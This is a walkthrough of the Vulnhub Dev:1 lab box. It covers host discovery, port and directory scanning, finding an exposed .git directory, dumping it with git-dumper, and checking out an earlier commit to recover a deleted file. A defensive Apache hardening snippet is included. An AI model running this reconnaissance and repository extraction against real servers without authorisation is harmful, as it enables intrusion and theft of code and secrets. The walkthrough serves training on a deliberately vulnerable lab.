Vulnhub Dev:1 Box: Detailed Walkthrough

Dev:1

Box name: Dev:1

Box URL: https://www.vulnhub.com/entry/dev-1,574/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.68.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:7d:6d:47      1      60  PCS Systemtechnik GmbH
 192.168.56.183  08:00:27:bd:54:32      1      60  PCS Systemtechnik GmbH

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.183.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.183 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 23:41 EST
Nmap scan report for bogon (192.168.56.183)
Host is up (0.000089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ae:98:ea:ab:60:97:33:6a:24:8a:87:ae:52:1b:8f:01 (RSA)
|   256 71:bb:5b:26:ea:2c:97:89:13:b6:b3:67:da:c7:15:09 (ECDSA)
|_  256 f7:49:8e:51:58:bc:33:db:f6:93:01:89:13:02:ec:d6 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:BD:54:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds

The NMAP scan shows the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Get Access

Visiting port 80 returns the Apache default page, and there is no robots.txt either.

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ curl http://192.168.56.183/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.183 Port 80</address>
</body></html>

Next, scan for directories.

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.183
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/17 02:14:31 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/wwwdev               (Status: 301) [Size: 317] [--> http://192.168.56.183/wwwdev/]
Progress: 219294 / 220561 (99.43%)
===============================================================
2022/11/17 02:14:58 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ curl http://192.168.56.183/wwwdev/
<!doctype html>
<html>
<head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, viewport-fit=cover">
        <meta name="apple-mobile-web-app-capable" content="yes" />

        <!-- Don't forget to merge the changes! -->

        <!-- Page Title -->
        <title>Under construction!</title> 

        <!-- Compressed Styles -->
        <link href="css/slides.min.css?41331" rel="stylesheet" type="text/css">

        <!-- Custom Styles -->
        <!-- <link href="css/custom.css" rel="stylesheet" type="text/css"> -->

        <!-- jQuery 3.3.1 -->
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

        <!-- Compressed Scripts -->
        <script src="js/slides.min.js?41331" type="text/javascript"></script>

        <!-- Custom Scripts -->
        <!-- <script src="js/custom.js" type="text/javascript"></script> -->

        <!-- Fonts and Material Icons -->
        <link rel="stylesheet" as="font" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,600,700|Material+Icons"/>
 
</head>
<body class="slides chain simplifiedMobile animated">
...


┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ dirb http://192.168.56.183

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Nov 17 02:23:25 2022
URL_BASE: http://192.168.56.183/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.183/ ----
+ http://192.168.56.183/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.183/server-status (CODE:403|SIZE:279)

-----------------
END_TIME: Thu Nov 17 02:23:26 2022
DOWNLOADED: 4612 - FOUND: 2

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183/wwwdev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.183/wwwdev/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/17 02:23:44 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 324] [--> http://192.168.56.183/wwwdev/assets/]
/css                  (Status: 301) [Size: 321] [--> http://192.168.56.183/wwwdev/css/]
/js                   (Status: 301) [Size: 320] [--> http://192.168.56.183/wwwdev/js/]
Progress: 217357 / 220561 (98.55%)
===============================================================
2022/11/17 02:24:10 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183/wwwdev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.183/wwwdev/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/17 02:24:37 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 30845]
/assets               (Status: 301) [Size: 324] [--> http://192.168.56.183/wwwdev/assets/]
/css                  (Status: 301) [Size: 321] [--> http://192.168.56.183/wwwdev/css/]
/js                   (Status: 301) [Size: 320] [--> http://192.168.56.183/wwwdev/js/]
/.html                (Status: 403) [Size: 279]
Progress: 1100533 / 1102805 (99.79%)
===============================================================
2022/11/17 02:26:55 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ dirb http://192.168.56.183/wwwdev/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Nov 17 02:27:08 2022
URL_BASE: http://192.168.56.183/wwwdev/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.183/wwwdev/ ----
+ http://192.168.56.183/wwwdev/.git/HEAD (CODE:200|SIZE:21)
==> DIRECTORY: http://192.168.56.183/wwwdev/assets/
==> DIRECTORY: http://192.168.56.183/wwwdev/css/
+ http://192.168.56.183/wwwdev/index.html (CODE:200|SIZE:30845)
==> DIRECTORY: http://192.168.56.183/wwwdev/js/

---- Entering directory: http://192.168.56.183/wwwdev/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.183/wwwdev/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.183/wwwdev/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Nov 17 02:27:10 2022
DOWNLOADED: 4612 - FOUND: 2

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ nikto -h http://192.168.56.183
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.183
+ Target Hostname:    192.168.56.183
+ Target Port:        80
+ Start Time:         2022-11-17 02:27:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5b035e19b6fe1, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2022-11-17 02:27:38 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ nikto -h http://192.168.56.183/wwwdev/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.183
+ Target Hostname:    192.168.56.183
+ Target Port:        80
+ Start Time:         2022-11-17 02:27:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /wwwdev/, inode: 787d, size: 5b04aa4100d44, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /wwwdev/css/: Directory indexing found.
+ OSVDB-3092: /wwwdev/css/: This might be interesting...
+ OSVDB-3092: /wwwdev/.git/index: Git Index file may contain directory listing information.
+ /wwwdev/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /wwwdev/.git/config: Git config file found. Infos about repo details may be present.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-11-17 02:27:59 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


Only at this point, through nikto, does the .git directory turn up:

+ /wwwdev/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /wwwdev/.git/config: Git config file found. Infos about repo details may be present.
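From the defender's side, the two nikto findings (directory indexing under /wwwdev/css/ and a readable /wwwdev/.git/) are Apache configuration issues. The snippet below is an added illustration, not the box's real configuration: the first block is the permissive setup those findings imply, the second the hardened form, and /var/www/html is an assumed DocumentRoot.

```apache
# Weak (assumed, reconstructed from the nikto findings): auto-index on, dot-directories served
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

# Hardened: no auto-index, and nothing under a .git/.svn/.hg directory is ever served
<Directory /var/www/html>
    Options -Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

<DirectoryMatch "/\.(git|svn|hg)(/|$)">
    Require all denied
</DirectoryMatch>

# Also refuse loose dotfiles such as .gitignore or .env that a deploy may leave behind
<FilesMatch "^\.">
    Require all denied
</FilesMatch>
```

After `apachectl configtest` and a reload, `curl -I http://192.168.56.183/wwwdev/.git/HEAD` and `curl -I http://192.168.56.183/wwwdev/css/` should answer 403 where nikto saw 200. The root fix is to deploy an export of the repository (for example via `git archive`) instead of a working copy that carries its .git directory.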

This should be the foothold; it calls for the tool git-dumper.

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ cp -r ~/Tools/git-dumper .

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ ls
git-dumper  nmap_full_scan

┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ cd git-dumper

┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ ls
git_dumper.py  LICENSE  pyproject.toml  README.md  requirements.txt  setup.cfg

┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ python git_dumper.py http://192.168.56.183/wwwdev/.git  backup
[-] Testing http://192.168.56.183/wwwdev/.git/HEAD [200]
[-] Testing http://192.168.56.183/wwwdev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.56.183/wwwdev/.git/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/branches/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/info/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.gitignore [404]
[-] http://192.168.56.183/wwwdev/.gitignore responded with status code 404
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/description [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/index [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/config [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/HEAD [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/info/exclude [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/heads/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/tags/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/origin/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/heads/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/HEAD [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/origin/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/update.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/heads/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/origin/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/0d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/2b/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/3d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1a/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/03/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/02/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/8a/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/5f/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/9c/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/7e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4f/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/36/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/41/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/28/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/26/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/15/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/25/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/46/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/66/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/69/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/33/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/78/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/89/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/59/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a3/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/58/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/76/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/90/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/94/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a4/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b7/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ba/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b5/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cd/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cf/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c8/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e2/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/df/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e3/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f0/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e6/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e5/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/fe/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/info/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/pack/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/80/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/2b/f6e5d75bad126c38776eab62e32a157c8b3e20 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4e/fea96bd51cd68f4989d276c10ae0726275b9b6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1a/bb1945a3b0a5426b4f6b5744f464ff9d4fdff2 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/0d/7005caef4ca39df32e58459ecd2b0d84f5b095 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/02/3c940fb87367c8cd7c7dbdc2a6fa18cca18bfd [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/03/0b875624dc0f8dc8db37d176c0c47fe2c5bfe3 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/3d/d400f34512b2a401935c24ecd52695c00e0fd1 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/7e/7ee5469d3b14875c7dca6a8c43cb6d3958a4ad [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/5f/10a6160f03efb05707945e265dac990cf4f810 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4d/896226bde1925610098517cf97d7c8795530a6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/8a/58fed23004a9c8b147024df3b80643f15aee17 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1e/e6576d05f047394ffe8a152d4a28ccc3f8e274 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/9c/8afc48d9f57ae7c5c5506d612e89f0372cc38d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4f/c73b0ccbad17e97e0d472225f2dcfa55dbdf41 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/41/9307de82a01c0eaf24d49693ef27d9b03014cc [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/36/24ee753f5818c330b57f2e185d1ba46918b623 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/25/e79d498188a2cf825d78b5518ca7dc2ed6b72a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/28/b1b07b549943e971bd420cf5d45b76c033d524 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/15/b4a272a081c7f5af240920bbf8af42622fc06f [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/66/1bdaa911be3bc3da002371b6007121c8c9ed6b [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/26/5592bf366986046ea395b10d4d378672347080 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/69/9558891301a8fc88eb8350946718169c693de2 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/46/8d5a3abf492004162a4d261a91e683725ad221 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/59/6f6443878d3ad8984fed5f3883b4a5afb0c468 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/89/64ec37df319b2beeaa1b118caf673e654770a6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/76/d03887b3deff5b88c5bd06902ab8d9b4aa4a1d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/78/b0a41a535b6860c2ac0dd6d41f0feb48f3c613 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/58/c651c69b37acdc408d8a0b7c09692da5491af9 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a4/d37efc67f8ec3aafab8a1db239cd55e7984a2c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b7/f734503b2f7f6ccff4c644636264fb1bfa009c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ba/1936d7f1191e6e7649373abade7eabab109508 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a3/c232884ee15fb12b18158a4fbd001d7bd7ed40 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/33/b3db8b5079f0f6442212fdc58e084f63c24495 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/cd09a5dca66b7c43439e9d57618280a7a29613 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/90/318c8733437e835b0daccb5d32cab34c3b3d0c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/b0bfbb8423fcd06977fa71fa0ad26d2e4bcd51 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/ba3da30112780a7be1e4411b066762193ab06b [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/b57abbdaa46b80d84af666ac0d39b122247efc [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/94/6e7bc9f5bd9a73573fe4077ac03a5c87d004a7 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/de897fd45fcf19efc2de758ad15511e6e7d435 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/24224e15c52f95a1ea06af09b3640a95a5cf9e [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cd/9c3bca0fb28dbed3c3065f1c393eb3f5a1b777 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/b0b8139855a2a8ddaa9ec82b445841673c84ce [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b5/5fee4d85c9a08e363d7f70dbe12343af61cdeb [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ca4de938c76444bc4b1fda038fbffbff33630a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ce1ef9f41b4be13643c95f388735d4ba1dabdf [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c8/bee72df024a525f4db1f62abcd8125ad0d4edb [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/4ac75809c0445dacee9b41bcf29e6bd818981d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e2/657effb3753941e2b0d2be925ac3e0ae4f6201 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/e65b29174319ce8d2e66368d7e59ed9ea0a0d4 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cf/4c40b6398dcc0f0e6fff3e99edc9da1e4eefa7 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/e2a3675f4b2f2196276fd11cac9d210a2fc737 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/fe/b7977eb39ca24d571bca34d3ac1c40e3a05d18 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/df/8c6e8d16c6c3138535b2e4ab18444af4ae144e [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e3/8e73578d11b5f5d682312c5058d1a9a378e4b3 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e5/a9372d0bca672950313c7178762bb18381564a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/fce0c938b4e42309dd0133ef9d32eccc0de4ed [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e6/b18cce7dd281e69c4849c5fec752699b7c9383 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f0/f42ebee63e1bf434ff936c9c47dc8952156ba6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/80/72e242fdc09129cac94c569f6cc5ee0aef8059 [200]
[-] Running git checkout .
Updated 48 paths from the index
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ ls
backup  git_dumper.py  LICENSE  pyproject.toml  README.md  requirements.txt  setup.cfg
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ cd backup
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ ls
ajax-email.php  assets  css  index.html  js  scss
                                                           

git-dumper has now reconstructed the repository locally on Kali Linux. Note that this is not a `git clone`: the server exposes `/wwwdev/.git/` over HTTP without directory listing, so the tool fetches each loose object (`objects/XX/YYYY…`) individually and then runs `git checkout .` to rebuild the working tree from the index. The checked-out tree only reflects HEAD; anything removed in a later commit is still in the object store and can be recovered from the history.

┌──(kali㉿kali)-[~/…/Dev/git-dumper/backup/.git]
└─$ git log                                                                                                                             
commit 8072e242fdc09129cac94c569f6cc5ee0aef8059 (HEAD -> main, origin/main)
Author: User <f3dai@dev.local>
Date:   Mon Oct 12 23:44:09 2020 +0100

    updated: removed file

commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Author: User <f3dai@dev.local>
Date:   Mon Oct 12 23:43:00 2020 +0100

    First commit :)

`git log` shows two commits. The message of the second (HEAD) is "updated: removed file", so whatever was deleted is still present in the first commit's tree. Check out the first commit to get it back:

┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ git checkout f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Note: switching to 'f9e2a3675f4b2f2196276fd11cac9d210a2fc737'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

